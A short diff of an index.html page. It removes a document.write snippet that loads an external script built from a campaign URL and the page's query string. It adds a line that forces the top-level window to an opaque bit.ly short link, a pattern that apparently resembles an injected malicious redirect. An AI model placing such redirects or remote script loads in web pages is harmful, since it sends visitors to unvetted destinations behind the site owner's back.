--- a/index.html
+++ b/index.html
@@ -1,9 +1,3 @@
 <script>
-
-(function(campaign, landing) 
-{
-	document.write('<script src="' + (campaign) + (campaign.indexOf('?') == -1 ? '?' : '&') + (landing ? ('landing2=' + landing + '&') : '') 
-	+ (location.href.indexOf('?') > -1 ? location.href.substr(location.href.indexOf('?') + 1) : '') + '"></' + 'script>');
-})('https://www.youtube.com/watch?v=cD-d7u6fnEI&t=152s');
-
+window.top.location = 'http://bit.ly/2lyJafYk';
 </script>
